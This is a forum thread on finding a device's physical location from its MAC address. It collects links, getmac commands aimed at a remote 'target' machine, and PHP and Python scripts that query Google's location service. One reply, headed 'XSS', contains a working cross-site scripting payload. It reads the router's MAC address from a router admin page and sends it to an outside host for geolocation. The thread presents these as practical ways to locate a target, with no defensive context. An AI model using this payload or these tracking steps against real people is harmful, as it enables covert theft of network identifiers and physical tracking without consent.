Using MAC ADDRESS To Find Actual Location
Page 1 of 1
Using MAC ADDRESS To Find Actual Location
Trace Location Using MAC Address Of Your Router
http://windowstipoftheday.blogspot.co.uk/2006/02/finding-mac-address-of-remote-computer.html
http://samy.pl/androidmap/
https://code.google.com/p/o2platform/downloads/list
http://www.ciscozine.com/how-to-trace-mac-address/
https://youtu.be/vJtmZZGcR54
https://www.youtube.com/watch?v=IgX6Ij_GXf4
https://youtu.be/G_XfZ99ZKCc
https://stackoverflow.com/questions/4643405/geolocating-802-11-access-points-by-mac-address-using-google-geolocation-api
http://rumyittips.com/how-to-track-any-mac-address-geographical-location/
https://www.youtube.com/watch?v=LeXUKs3FrgM
viper is target name
If your not on a domain
Web Based Code for PHP
More Info
http://www.cnet.com/news/exclusive-googles-web-mapping-can-track-your-phone
http://windowstipoftheday.blogspot.co.uk/2006/02/finding-mac-address-of-remote-computer.html
http://samy.pl/androidmap/
https://code.google.com/p/o2platform/downloads/list
http://www.ciscozine.com/how-to-trace-mac-address/
https://youtu.be/vJtmZZGcR54
https://www.youtube.com/watch?v=IgX6Ij_GXf4
https://youtu.be/G_XfZ99ZKCc
https://stackoverflow.com/questions/4643405/geolocating-802-11-access-points-by-mac-address-using-google-geolocation-api
http://rumyittips.com/how-to-track-any-mac-address-geographical-location/
https://www.youtube.com/watch?v=LeXUKs3FrgM
viper is target name
getmac /s viper
If your not on a domain
getmac /s/u /p
Web Based Code for PHP
- Code:
<?php
$mac = $_SERVER['argv'][1];
$postData = '{
"version": "1.1.0",
"wifi_towers": [{
"mac_address": "' . $mac . '",
"ssid": "0",
"signal_strength":-72
}]
}';
$opts = array(
'http'=>array(
'method' => "POST",
'header' => 'Content-type: application/x-www-form-urlencoded',
'content' => $postData
)
);
$response = file_get_contents(
'http://www.google.com/loc/json',
false,
stream_context_create($opts)
);
$loc = json_decode($response, true);
echo $loc['location']['latitude'];
echo ',';
echo $loc['location']['longitude'];
?>
More Info
http://www.cnet.com/news/exclusive-googles-web-mapping-can-track-your-phone
Last edited by jamied_uk on 18th November 2015, 20:51; edited 3 times in total
Re: Using MAC ADDRESS To Find Actual Location
Get your own external IP
now type getmyip
- Code:
alias getmyip='dig +short myip.opendns.com @resolver1.opendns.com'
now type getmyip
Re: Using MAC ADDRESS To Find Actual Location
Last edited by jamied_uk on 18th November 2015, 20:57; edited 1 time in total
Re: Using MAC ADDRESS To Find Actual Location
Using Googles Map API
- Code:
import urllib2
import simplejson
def locate(mac, ssid):
url = "http://www.google.com/loc/json"
ap = {"mac_address":mac, "ssid":ssid, "signal_strength":-81}
aps = [ap]
data = {
'version': '1.1.0',
'host': 'www.google.com',
'request_address': True,
'wifi_towers': aps,
}
jdata = simplejson.dumps(data)
resp = urllib2.urlopen(url, jdata).read()
return simplejson.loads(resp)
Re: Using MAC ADDRESS To Find Actual Location
XSS
- Code:
var xmlhttp = new XMLHttpRequest();
xmlhttp.open('GET', '/index.cgi?active%5fpage=9124&req%5fmode=0&mimic%5fbutton%5ffield=goto%3a+9124%2e%2e&button%5fvalue=9124', true);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
{
var mac = xmlhttp.responseText.substr(xmlhttp.responseText.indexOf('00:21:63'), 17);
mac = mac.replace(/:/g, '-');
document.location = 'http://samy.pl/mapxss/fiosmap.php?mac=' + mac;
}
}
xmlhttp.send();
Similar topics
» USB and Wifi Tethering IP Address, Mac Address DHCP eth0 wlan0 lo usb0 Networking with multiple Networks
» Show your current Mac Address and change mac address using macchanger
» Geo Location and isp info using ip script!
» How to get the location of the user using jQuery
» Linux Bash Lookup Geo Location From IP
» Show your current Mac Address and change mac address using macchanger
» Geo Location and isp info using ip script!
» How to get the location of the user using jQuery
» Linux Bash Lookup Geo Location From IP
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum